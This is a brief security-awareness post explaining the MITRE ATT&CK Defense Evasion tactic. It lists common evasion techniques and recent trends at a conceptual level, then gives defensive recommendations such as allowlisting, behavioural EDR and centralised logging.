Cyber attackers, they no longer sneak into your systems — they live within them, unseen and unnoticed. The MITRE ATT&CK tactic TA0005: Defense Evasion focuses on how adversaries dodge security tools, act legitimate, delete traces, and disguise their activities to stay undetected.

⚙️ Common Evasion Tricks

• 🧰 Living Off the Land (LOTL): Using built-in tools like PowerShell, certutil, or mshta instead of malware to blend in.

• 🎭 Masquerading & DLL Side-Loading: Renaming files or loading malicious DLLs through trusted apps.

• 💾 Fileless Attacks: Running payloads directly in memory to avoid leaving footprints on disk.

• 🔐 Obfuscation: Encoding or encrypting scripts to bypass scanners.

• 🧹 Log Tampering: Deleting or altering logs to erase evidence.

• 🚫 Security Disablement: Turning off antivirus, EDR, or firewalls before executing attacks.

• 🪪 Abuse of Trust: Using stolen digital certificates or legitimate cloud services to appear safe.
  

🧨 Recent Trends

• Ransomware groups like ALPHV/BlackCat use Rust-based loaders to evade detection.

• DLL side-loading remains a favorite in targeted attacks to run code under trusted names.

• Fileless techniques are rising — malware now “lives” in memory, avoiding file-based scanning.

• Government advisories report growing use of LOLBins, where everyday tools become weapons.
  

🛡️ How to Defend

• 🚫 Limit admin privileges: The fewer admins, the fewer ways attackers can hide.

• ✅ Enable allowlisting: Let only approved apps run on endpoints.

• 🧱 Patch regularly: Many evasion tricks follow an exploit.

• 👀 Monitor PowerShell & command-line use: Unusual patterns = red flag.

• 🧩 Use behavioral EDR: Catch process injection and memory-only payloads.

• 📜 Centralize logs: Store and protect them so attackers can’t delete history.

• 🔒 Back up smart: Keep offline or immutable backups in case evasion leads to ransomware.
  

💡 Final Thoughts

Defense evasion is the hacker’s invisibility cloak. But visibility is power; strong monitoring, behavior-based detection, and smart prevention will strip that cloak away.